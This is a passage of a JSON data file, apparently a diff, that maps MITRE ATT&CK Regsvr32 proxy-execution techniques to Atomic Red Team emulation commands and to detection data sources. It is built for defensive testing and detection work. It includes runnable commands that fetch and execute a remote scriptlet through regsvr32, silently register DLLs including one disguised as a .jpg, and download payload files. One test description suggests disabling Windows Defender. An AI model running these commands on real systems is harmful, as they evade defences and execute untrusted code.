-ErrorAction Ignore | Out-Null\nRemove-Item $parentpath\\T1218.009.tlb -ErrorAction Ignore | Out-Null\n", + "name": "powershell", + "elevation_required": true + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ] + ] + }, + { + "technique_id": "T1218.010", + "command_list": [ + "#{regsvr32path}\\#{regsvr32name} /s /u /i:PathToAtomicsFolder\\T1218.010\\src\\RegSvr32.sct scrobj.dll\n", + "C:\\Windows\\system32\\#{regsvr32name} /s /u /i:#{filename} scrobj.dll\n", + "#{regsvr32path}\\regsvr32.exe /s /u /i:#{filename} scrobj.dll\n", + "#{regsvr32path}\\#{regsvr32name} /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.010/src/RegSvr32.sct scrobj.dll\n", + "C:\\Windows\\system32\\#{regsvr32name} /s /u /i:#{url} scrobj.dll\n", + "#{regsvr32path}\\regsvr32.exe /s /u /i:#{url} scrobj.dll\n", + "IF \"%PROCESSOR_ARCHITECTURE%\"==\"AMD64\" (C:\\Windows\\syswow64\\regsvr32.exe /s PathToAtomicsFolder\\T1218.010\\bin\\AllTheThingsx86.dll) ELSE ( #{regsvr32path}\\#{regsvr32name} /s PathToAtomicsFolder\\T1218.010\\bin\\AllTheThingsx86.dll )\n", + "IF \"%PROCESSOR_ARCHITECTURE%\"==\"AMD64\" (C:\\Windows\\syswow64\\regsvr32.exe /s #{dll_name}) ELSE ( C:\\Windows\\system32\\#{regsvr32name} /s #{dll_name} )\n", + "IF \"%PROCESSOR_ARCHITECTURE%\"==\"AMD64\" (C:\\Windows\\syswow64\\regsvr32.exe /s #{dll_name}) ELSE ( #{regsvr32path}\\regsvr32.exe /s #{dll_name} )\n", + "#{regsvr32path}\\#{regsvr32name} /s %temp%\\shell32.jpg\n", + "C:\\Windows\\system32\\#{regsvr32name} /s #{dll_file}\n", + "#{regsvr32path}\\regsvr32.exe /s #{dll_file}\n", + "#{regsvr32path}\\#{regsvr32name} /s /i PathToAtomicsFolder\\T1218.010\\bin\\AllTheThingsx86.dll", + "C:\\Windows\\system32\\#{regsvr32name} /s /i #{dll_name}", + "#{regsvr32path}\\regsvr32.exe /s /i #{dll_name}" + ], + "commands": [ + { + "command": "#{regsvr32path}\\#{regsvr32name} /s /u /i:PathToAtomicsFolder\\T1218.010\\src\\RegSvr32.sct scrobj.dll\n", + "source": "atomics/T1218.010/T1218.010.yaml", + "name": "Atomic Red Team Test - Signed Binary Proxy Execution: Regsvr32" + }, + { + "command": "C:\\Windows\\system32\\#{regsvr32name} /s /u /i:#{filename} scrobj.dll\n", + "source": "atomics/T1218.010/T1218.010.yaml", + "name": "Atomic Red Team Test - Signed Binary Proxy Execution: Regsvr32" + }, + { + "command": "#{regsvr32path}\\regsvr32.exe /s /u /i:#{filename} scrobj.dll\n", + "source": "atomics/T1218.010/T1218.010.yaml", + "name": "Atomic Red Team Test - Signed Binary Proxy Execution: Regsvr32" + }, + { + "command": "#{regsvr32path}\\#{regsvr32name} /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.010/src/RegSvr32.sct scrobj.dll\n", + "source": "atomics/T1218.010/T1218.010.yaml", + "name": "Atomic Red Team Test - Signed Binary Proxy Execution: Regsvr32" + }, + { + "command": "C:\\Windows\\system32\\#{regsvr32name} /s /u /i:#{url} scrobj.dll\n", + "source": "atomics/T1218.010/T1218.010.yaml", + "name": "Atomic Red Team Test - Signed Binary Proxy Execution: Regsvr32" + }, + { + "command": "#{regsvr32path}\\regsvr32.exe /s /u /i:#{url} scrobj.dll\n", + "source": "atomics/T1218.010/T1218.010.yaml", + "name": "Atomic Red Team Test - Signed Binary Proxy Execution: Regsvr32" + }, + { + "command": "IF \"%PROCESSOR_ARCHITECTURE%\"==\"AMD64\" (C:\\Windows\\syswow64\\regsvr32.exe /s PathToAtomicsFolder\\T1218.010\\bin\\AllTheThingsx86.dll) ELSE ( #{regsvr32path}\\#{regsvr32name} /s PathToAtomicsFolder\\T1218.010\\bin\\AllTheThingsx86.dll )\n", + "source": "atomics/T1218.010/T1218.010.yaml", + "name": "Atomic Red Team Test - Signed Binary Proxy Execution: Regsvr32" + }, + { + "command": "IF \"%PROCESSOR_ARCHITECTURE%\"==\"AMD64\" (C:\\Windows\\syswow64\\regsvr32.exe /s #{dll_name}) ELSE ( C:\\Windows\\system32\\#{regsvr32name} /s #{dll_name} )\n", + "source": "atomics/T1218.010/T1218.010.yaml", + "name": "Atomic Red Team Test - Signed Binary Proxy Execution: Regsvr32" + }, + { + "command": "IF \"%PROCESSOR_ARCHITECTURE%\"==\"AMD64\" (C:\\Windows\\syswow64\\regsvr32.exe /s #{dll_name}) ELSE ( #{regsvr32path}\\regsvr32.exe /s #{dll_name} )\n", + "source": "atomics/T1218.010/T1218.010.yaml", + "name": "Atomic Red Team Test - Signed Binary Proxy Execution: Regsvr32" + }, + { + "command": "#{regsvr32path}\\#{regsvr32name} /s %temp%\\shell32.jpg\n", + "source": "atomics/T1218.010/T1218.010.yaml", + "name": "Atomic Red Team Test - Signed Binary Proxy Execution: Regsvr32" + }, + { + "command": "C:\\Windows\\system32\\#{regsvr32name} /s #{dll_file}\n", + "source": "atomics/T1218.010/T1218.010.yaml", + "name": "Atomic Red Team Test - Signed Binary Proxy Execution: Regsvr32" + }, + { + "command": "#{regsvr32path}\\regsvr32.exe /s #{dll_file}\n", + "source": "atomics/T1218.010/T1218.010.yaml", + "name": "Atomic Red Team Test - Signed Binary Proxy Execution: Regsvr32" + }, + { + "command": "#{regsvr32path}\\#{regsvr32name} /s /i PathToAtomicsFolder\\T1218.010\\bin\\AllTheThingsx86.dll", + "source": "atomics/T1218.010/T1218.010.yaml", + "name": "Atomic Red Team Test - Signed Binary Proxy Execution: Regsvr32" + }, + { + "command": "C:\\Windows\\system32\\#{regsvr32name} /s /i #{dll_name}", + "source": "atomics/T1218.010/T1218.010.yaml", + "name": "Atomic Red Team Test - Signed Binary Proxy Execution: Regsvr32" + }, + { + "command": "#{regsvr32path}\\regsvr32.exe /s /i #{dll_name}", + "source": "atomics/T1218.010/T1218.010.yaml", + "name": "Atomic Red Team Test - Signed Binary Proxy Execution: Regsvr32" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1218.010", + "display_name": "Signed Binary Proxy Execution: Regsvr32", + "atomic_tests": [ + { + "name": "Regsvr32 local COM scriptlet execution", + "auto_generated_guid": "449aa403-6aba-47ce-8a37-247d21ef0306", + "description": "Regsvr32.exe is a command-line program used to register and unregister OLE controls. Upon execution, calc.exe will be launched.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "filename": { + "description": "Name of the local file, include path.", + "type": "Path", + "default": "PathToAtomicsFolder\\T1218.010\\src\\RegSvr32.sct" + }, + "regsvr32path": { + "description": "Default location of Regsvr32.exe", + "type": "Path", + "default": "C:\\Windows\\system32" + }, + "regsvr32name": { + "description": "Default name of Regsvr32.exe", + "type": "String", + "default": "regsvr32.exe" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "Regsvr32.sct must exist on disk at specified location (#{filename})\n", + "prereq_command": "if (Test-Path #{filename}) {exit 0} else {exit 1}\n", + "get_prereq_command": "New-Item -Type Directory (split-path #{filename}) -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.010/src/RegSvr32.sct\" -OutFile \"#{filename}\"\n" + } + ], + "executor": { + "command": "#{regsvr32path}\\#{regsvr32name} /s /u /i:#{filename} scrobj.dll\n", + "name": "command_prompt" + } + }, + { + "name": "Regsvr32 remote COM scriptlet execution", + "auto_generated_guid": "c9d0c4ef-8a96-4794-a75b-3d3a5e6f2a36", + "description": "Regsvr32.exe is a command-line program used to register and unregister OLE controls. This test may be blocked by windows defender; disable\nwindows defender real-time protection to fix it. Upon execution, calc.exe will be launched.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "url": { + "description": "URL to hosted sct file", + "type": "Url", + "default": "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.010/src/RegSvr32.sct" + }, + "regsvr32path": { + "description": "Default location of Regsvr32.exe", + "type": "Path", + "default": "C:\\Windows\\system32" + }, + "regsvr32name": { + "description": "Default name of Regsvr32.exe", + "type": "String", + "default": "regsvr32.exe" + } + }, + "executor": { + "command": "#{regsvr32path}\\#{regsvr32name} /s /u /i:#{url} scrobj.dll\n", + "name": "command_prompt" + } + }, + { + "name": "Regsvr32 local DLL execution", + "auto_generated_guid": "08ffca73-9a3d-471a-aeb0-68b4aa3ab37b", + "description": "Regsvr32.exe is a command-line program used to register and unregister OLE controls. Upon execution, calc.exe will be launched.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "dll_name": { + "description": "Name of DLL to Execute, DLL Should export DllRegisterServer", + "type": "Path", + "default": "PathToAtomicsFolder\\T1218.010\\bin\\AllTheThingsx86.dll" + }, + "regsvr32path": { + "description": "Default location of Regsvr32.exe", + "type": "Path", + "default": "C:\\Windows\\system32" + }, + "regsvr32name": { + "description": "Default name of Regsvr32.exe", + "type": "String", + "default": "regsvr32.exe" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "AllTheThingsx86.dll must exist on disk at specified location (#{dll_name})\n", + "prereq_command": "if (Test-Path #{dll_name}) {exit 0} else {exit 1}\n", + "get_prereq_command": "New-Item -Type Directory (split-path #{dll_name}) -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.010/bin/AllTheThingsx86.dll\" -OutFile \"#{dll_name}\"\n" + } + ], + "executor": { + "command": "IF \"%PROCESSOR_ARCHITECTURE%\"==\"AMD64\" (C:\\Windows\\syswow64\\regsvr32.exe /s #{dll_name}) ELSE ( #{regsvr32path}\\#{regsvr32name} /s #{dll_name} )\n", + "name": "command_prompt" + } + }, + { + "name": "Regsvr32 Registering Non DLL", + "auto_generated_guid": "1ae5ea1f-0a4e-4e54-b2f5-4ac328a7f421", + "description": "Replicating observed Gozi maldoc behavior registering a dll with an altered extension\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "dll_file": { + "description": "Path to renamed dll file to be registered", + "type": "Path", + "default": "%temp%\\shell32.jpg" + }, + "regsvr32path": { + "description": "Default location of Regsvr32.exe", + "type": "Path", + "default": "C:\\Windows\\system32" + }, + "regsvr32name": { + "description": "Default name of Regsvr32.exe", + "type": "String", + "default": "regsvr32.exe" + } + }, + "dependency_executor_name": "command_prompt", + "dependencies": [ + { + "description": "Test requires a renamed dll file\n", + "prereq_command": "if exist #{dll_file} ( exit 0 ) else ( exit 1 )\n", + "get_prereq_command": "copy \"C:\\Windows\\System32\\shell32.dll\" \"#{dll_file}\"\n" + } + ], + "executor": { + "name": "command_prompt", + "elevation_required": false, + "command": "#{regsvr32path}\\#{regsvr32name} /s #{dll_file}\n", + "cleanup_command": "#{regsvr32path}\\#{regsvr32name} /U /s #{dll_file}\n" + } + }, + { + "name": "Regsvr32 Silent DLL Install Call DllRegisterServer", + "auto_generated_guid": "9d71c492-ea2e-4c08-af16-c6994cdf029f", + "description": "Regsvr32.exe is a command-line program used to register and unregister OLE controls. Normally, an install is executed with /n to prevent calling DllRegisterServer.", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "dll_name": { + "description": "Name of DLL to Install", + "type": "String", + "default": "PathToAtomicsFolder\\T1218.010\\bin\\AllTheThingsx86.dll" + }, + "regsvr32path": { + "description": "Default location of Regsvr32.exe", + "type": "String", + "default": "C:\\Windows\\system32" + }, + "regsvr32name": { + "description": "Default name of Regsvr32.exe", + "type": "String", + "default": "regsvr32.exe" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "AllTheThingsx86.dll must exist on disk at specified location (#{dll_name})", + "prereq_command": "if (Test-Path #{dll_name}) {exit 0} else {exit 1}", + "get_prereq_command": "New-Item -Type Directory (split-path #{dll_name}) -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.010/bin/AllTheThingsx86.dll\" -OutFile \"#{dll_name}\"" + } + ], + "executor": { + "command": "#{regsvr32path}\\#{regsvr32name} /s /i #{dll_name}", + "name": "command_prompt" + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "module", + "definition": "Information about module files consisting of one or more classes and interfaces, such as portable executable (PE) format executables/dynamic link libraries (DLL), executable and linkable format (ELF) executables/shared libraries, and Mach-O format executables/shared libraries.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "module load", + "description": "A module was loaded into a process.", + "source_data_element": "process", + "relationship": "loaded", + "target_data_element": "module" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted to bind on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "bound to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted to listen on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "listened on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + 